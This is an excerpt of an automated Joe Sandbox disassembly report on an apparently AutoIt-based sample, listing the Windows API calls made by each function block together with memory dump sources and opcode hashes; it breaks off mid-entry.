                                • Instruction Fuzzy Hash: EF11A031D40619DBCF04EFE5D989BEEBB34FF4A315F004085E942B6140CB709950D799
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                • Instruction ID: 9cdae9cddea5f37bd3ab9e0ec2f5cbbc5c36d3f52d649f9d5b21c3c90aa8cb81
                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                • Instruction Fuzzy Hash: C5014B3200064EBBCF135F84DC49CEE3F62BB1C350B588815FE2859031D236CAB1AB81
                                APIs
                                  • Part of subcall function 00C8869D: __getptd_noexit.LIBCMT ref: 00C8869E
                                • __lock.LIBCMT ref: 00C8811F
                                • InterlockedDecrement.KERNEL32(?), ref: 00C8813C
                                • _free.LIBCMT ref: 00C8814F
                                • InterlockedIncrement.KERNEL32(00DE2710), ref: 00C88167
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 2704283638-0
                                • Opcode ID: 8a9aaa1f6a48d5f5994f7129d39a5943a9671cd28806fe65b2f92ba61bdc6623
                                • Instruction ID: d3838cd699fb8a30c77c65b9aeceb3117d85cb7ebfcfde9aa546ccbc4f31f93a
                                • Opcode Fuzzy Hash: 8a9aaa1f6a48d5f5994f7129d39a5943a9671cd28806fe65b2f92ba61bdc6623
                                • Instruction Fuzzy Hash: 4501C431902B11ABCB12BF68980E79DB360BF00728F444105F820A7BD1DF346946DBEA
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00CCDE07
                                • ScreenToClient.USER32(?,?), ref: 00CCDE1F
                                • ScreenToClient.USER32(?,?), ref: 00CCDE43
                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CCDE5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClientRectScreen$InvalidateWindow
                                • String ID:
                                • API String ID: 357397906-0
                                • Opcode ID: 49918d244da5e3942403a5b256ce86e059a78e7a37c4d013f48d1add2d0df8f7
                                • Instruction ID: b5467e07882b9f43bb0c624485414caf460b689fd4e60d1226eee2308d0ac6ea
                                • Opcode Fuzzy Hash: 49918d244da5e3942403a5b256ce86e059a78e7a37c4d013f48d1add2d0df8f7
                                • Instruction Fuzzy Hash: F1112DB9D00249EFDB41DFA8C884AEEBBF9FB08310F108566E925E7210D735AA55CF50
                                APIs
                                • __lock.LIBCMT ref: 00C88768
                                  • Part of subcall function 00C88984: __mtinitlocknum.LIBCMT ref: 00C88996
                                  • Part of subcall function 00C88984: EnterCriticalSection.KERNEL32(00C80127,?,00C8876D,0000000D), ref: 00C889AF
                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00C88775
                                • __lock.LIBCMT ref: 00C88789
                                • ___addlocaleref.LIBCMT ref: 00C887A7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                • String ID:
                                • API String ID: 1687444384-0
                                • Opcode ID: 946d6f1de0cc1764b9d9abb6889c99c5fccb03c6fc389561601c7e737cf03b75
                                • Instruction ID: 2c46f28cf0d4116b1351b2e39860a7338a457142d5c5535ee04960e527923e8c
                                • Opcode Fuzzy Hash: 946d6f1de0cc1764b9d9abb6889c99c5fccb03c6fc389561601c7e737cf03b75
                                • Instruction Fuzzy Hash: 59016D71441B00EFD720EF65D905799B7F0AF40329F20890EE0AA877A0DF74A644DB15
                                APIs
                                • _memset.LIBCMT ref: 00CCE14D
                                • _memset.LIBCMT ref: 00CCE15C
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D23EE0,00D23F24), ref: 00CCE18B
                                • CloseHandle.KERNEL32 ref: 00CCE19D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memset$CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3277943733-0
                                • Opcode ID: 0df0c2c5b2f23db85b6646725718489b9618bb218e48562ef53381e44fa25286
                                • Instruction ID: 7d03f5883acd4562cf577cd0daf0b267c77efffb58fcfaf479c8feecd1968096
                                • Opcode Fuzzy Hash: 0df0c2c5b2f23db85b6646725718489b9618bb218e48562ef53381e44fa25286
                                • Instruction Fuzzy Hash: BAF054F1A40310BEE2106B65BC46F7B7AACDF16368F040420FE04D9292D3BA4E1157B8
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 00CA9C7F
                                  • Part of subcall function 00CAAD14: _memset.LIBCMT ref: 00CAAD49
                                • _memmove.LIBCMT ref: 00CA9CA2
                                • _memset.LIBCMT ref: 00CA9CAF
                                • LeaveCriticalSection.KERNEL32(?), ref: 00CA9CBF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                • String ID:
                                • API String ID: 48991266-0
                                • Opcode ID: 319ddf22e7b329e7389cb2baacb69616482d4c5cdcfa833f1379a822059e0483
                                • Instruction ID: f49a2d87ac27029e131c046ac9c5671bee95fd688b02f0564e9e0c01ccb9ddcc
                                • Opcode Fuzzy Hash: 319ddf22e7b329e7389cb2baacb69616482d4c5cdcfa833f1379a822059e0483
                                • Instruction Fuzzy Hash: 75F05476200000ABCF016F54EC85B49BB29EF45325F08C065FE095E217C732EC11EBB5
                                APIs
                                  • Part of subcall function 00C7B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                  • Part of subcall function 00C7B58B: BeginPath.GDI32(?), ref: 00C7B611
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCE860
                                • LineTo.GDI32(00000000,?,?), ref: 00CCE86D
                                • EndPath.GDI32(00000000), ref: 00CCE87D
                                • StrokePath.GDI32(00000000), ref: 00CCE88B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                • String ID:
                                • API String ID: 1539411459-0
                                • Opcode ID: 1d828590f0f75cb846a03398bad775dc3102cccf84ecb0d4bf97fad793172988
                                • Instruction ID: c286b5d13ef0a9d2617a25badc9395b67dccc9293183c989c27b8383ddfddc22
                                • Opcode Fuzzy Hash: 1d828590f0f75cb846a03398bad775dc3102cccf84ecb0d4bf97fad793172988
                                • Instruction Fuzzy Hash: 7DF0E231000299BBDB265F54AC0EFCE3F99AF16321F048101FF12680E1C3794612CFA5
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9D640
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D653
                                • GetCurrentThreadId.KERNEL32 ref: 00C9D65A
                                • AttachThreadInput.USER32(00000000), ref: 00C9D661
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: cd120fd4704c4b8a0bbf0d653434c769859604ac7f4518d5018a556762820711
                                • Instruction ID: 32aad479c2f85f0b65ce86fa71ff2660bbd833ef24032626c4b401143abd5699
                                • Opcode Fuzzy Hash: cd120fd4704c4b8a0bbf0d653434c769859604ac7f4518d5018a556762820711
                                • Instruction Fuzzy Hash: 1AE0ED715412A8BADB205FA2DC4DFDF7F5CEF567A2F408811B51E99060CA759580CBA0
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 00C9BE01
                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C9B9C9), ref: 00C9BE08
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C9B9C9), ref: 00C9BE15
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C9B9C9), ref: 00C9BE1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentOpenProcessThreadToken
                                • String ID:
                                • API String ID: 3974789173-0
                                • Opcode ID: 95974a154a43b54258abd968e3fcf2eae0f456e5372a47c7b5be6c2c7a0b08b3
                                • Instruction ID: ccc118d364348d43a0cf8a5808a5a198a100334f5b99cc054e8f8a93e2252568
                                • Opcode Fuzzy Hash: 95974a154a43b54258abd968e3fcf2eae0f456e5372a47c7b5be6c2c7a0b08b3
                                • Instruction Fuzzy Hash: 10E08632641291ABDB101FB1AD4CB9F3BACEF54792F048818F242DE050D7348941C761
                                APIs
                                • GetSysColor.USER32(00000008), ref: 00C7B0C5
                                • SetTextColor.GDI32(?,000000FF), ref: 00C7B0CF
                                • SetBkMode.GDI32(?,00000001), ref: 00C7B0E4
                                • GetStockObject.GDI32(00000005), ref: 00C7B0EC
                                • GetWindowDC.USER32(?,00000000), ref: 00CDECFA
                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CDED07
                                • GetPixel.GDI32(00000000,?,00000000), ref: 00CDED20
                                • GetPixel.GDI32(00000000,00000000,?), ref: 00CDED39
                                • GetPixel.GDI32(00000000,?,?), ref: 00CDED59
                                • ReleaseDC.USER32(?,00000000), ref: 00CDED64
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                • String ID:
                                • API String ID: 1946975507-0
                                • Opcode ID: a86a5dc70ffce91bb60c1e2aa67a9a23cdcd8024a1c0d9f89516bc2203c12f98
                                • Instruction ID: 60d6c38d4dffec1acead0d1e80badb19c2f569e4eabb3716efc670ece425b90c
                                • Opcode Fuzzy Hash: a86a5dc70ffce91bb60c1e2aa67a9a23cdcd8024a1c0d9f89516bc2203c12f98
                                • Instruction Fuzzy Hash: 73E0ED32500284AEEB216F74AC8979C3B21AB55336F14C266F77B9C0E2C7724A40DB11
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 4cab39b0687f51ca74fc5a31b6b336542a761b7a3520ddeabcdc6696c4efb6ac
                                • Instruction ID: 3524705f3d1b995360b1e9a1c1dd3bf107954528320d72dcf6bb4b4f6cf6cd19
                                • Opcode Fuzzy Hash: 4cab39b0687f51ca74fc5a31b6b336542a761b7a3520ddeabcdc6696c4efb6ac
                                • Instruction Fuzzy Hash: 54E046B2500240EFDB105FB0CC88B6D3BA9EB4C360F11C806FD4B8F310DAB598819B00
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C9C071
                                • UnloadUserProfile.USERENV(?,?), ref: 00C9C07D
                                • CloseHandle.KERNEL32(?), ref: 00C9C086
                                • CloseHandle.KERNEL32(?), ref: 00C9C08E
                                  • Part of subcall function 00C9B850: GetProcessHeap.KERNEL32(00000000,?,00C9B574), ref: 00C9B857
                                  • Part of subcall function 00C9B850: HeapFree.KERNEL32(00000000), ref: 00C9B85E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: 108ac63fd9aed968ae2f716805aa4591b13f85639f6807bab706483503cbe064
                                • Instruction ID: fd9060a50b8e6344324f6a56fc3b46ea933736f43b49022a3a66a972c5342b46
                                • Opcode Fuzzy Hash: 108ac63fd9aed968ae2f716805aa4591b13f85639f6807bab706483503cbe064
                                • Instruction Fuzzy Hash: 2DE0B636104046BFCB012FA5ED89A5DFB2AFF893213108225F626855B4CB32A871EB91
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 822c6a6868dfa6ace97e88df1c809b95fdd5b71b7fe3748b83339798244ad3f6
                                • Instruction ID: 951862f58fffcd3c38a16765ac0d69b3571127cd8d92372af1015db58c778edb
                                • Opcode Fuzzy Hash: 822c6a6868dfa6ace97e88df1c809b95fdd5b71b7fe3748b83339798244ad3f6
                                • Instruction Fuzzy Hash: 0CE0B6B5500244EFDB109F70DC8876D7BA9EB4C361F11C815F94F8F251DBB999819B50
                                APIs
                                • __getptd_noexit.LIBCMT ref: 00C84C3E
                                  • Part of subcall function 00C886B5: GetLastError.KERNEL32(?,00C80127,00C888A3,00C84673,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C886B7
                                  • Part of subcall function 00C886B5: __calloc_crt.LIBCMT ref: 00C886D8
                                  • Part of subcall function 00C886B5: GetCurrentThreadId.KERNEL32 ref: 00C88701
                                  • Part of subcall function 00C886B5: SetLastError.KERNEL32(00000000,00C80127,00C888A3,00C84673,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C88719
                                • CloseHandle.KERNEL32(?,?,00C84C1D), ref: 00C84C52
                                • __freeptd.LIBCMT ref: 00C84C59
                                • ExitThread.KERNEL32 ref: 00C84C61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                • String ID:
                                • API String ID: 408300095-0
                                • Opcode ID: 1ba4727e7d12e5d445ca76b7ff4f6f6b3a126ee0be80fe64e3d107a8f170dce8
                                • Instruction ID: 3fc06baaf1beb5fd77d497d5b3bda9051fe27f55fb92e622c3575a53ca336eb7
                                • Opcode Fuzzy Hash: 1ba4727e7d12e5d445ca76b7ff4f6f6b3a126ee0be80fe64e3d107a8f170dce8
                                • Instruction Fuzzy Hash: F4D0A731402A929BC13537208D0E70D36546F01B3EB024304F036094E09F214D05579A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: >$DEFINE
                                • API String ID: 4104443479-1664449232
                                • Opcode ID: 9a938aaffeec60e1f9e806a84db634a9d094ba85a382c6af9248782cc5c0467c
                                • Instruction ID: 5eece160361d490f4b64bf726c334e8d488d9f11d29ab8ac4de3eeda4ac04aef
                                • Opcode Fuzzy Hash: 9a938aaffeec60e1f9e806a84db634a9d094ba85a382c6af9248782cc5c0467c
                                • Instruction Fuzzy Hash: E1126C71A0024ADFCF24CF59C4C0AADB7B5FF48314F25825AE855AB391D734AE81DB90
                                APIs
                                • OleSetContainedObject.OLE32(?,00000001), ref: 00C9ECA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ContainedObject
                                • String ID: AutoIt3GUI$Container
                                • API String ID: 3565006973-3941886329
                                • Opcode ID: c209ba81536b9d8ad213326be318f01d07aac2ec340a5b22c5d78cf0be90f318
                                • Instruction ID: 8df8864790daa266d47821d6d92816a8af2048354f5c62f66ea585fee6da65f8
                                • Opcode Fuzzy Hash: c209ba81536b9d8ad213326be318f01d07aac2ec340a5b22c5d78cf0be90f318
                                • Instruction Fuzzy Hash: 56913775600601AFDB14DF64C888B6ABBF5BF58710F24846DF84ACB291EB71E941CB60
                                APIs
                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • __wcsnicmp.LIBCMT ref: 00CAE785
                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CAE84E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                • String ID: LPT
                                • API String ID: 3222508074-1350329615
                                • Opcode ID: dabf65b364c8e5f65eba27061c1f3c8f2212ab068c5ecc365f6552232fff01c0
                                • Instruction ID: 11b00e0d8d39562c1f0251dd4354de732265dc18848644b78e8861b5906b1eca
                                • Opcode Fuzzy Hash: dabf65b364c8e5f65eba27061c1f3c8f2212ab068c5ecc365f6552232fff01c0
                                • Instruction Fuzzy Hash: 27619175A00216AFCB14EF98C895EBEB7F4EF4A314F004069F556AB390DB34AE44DB90
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 00C61B83
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00C61B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
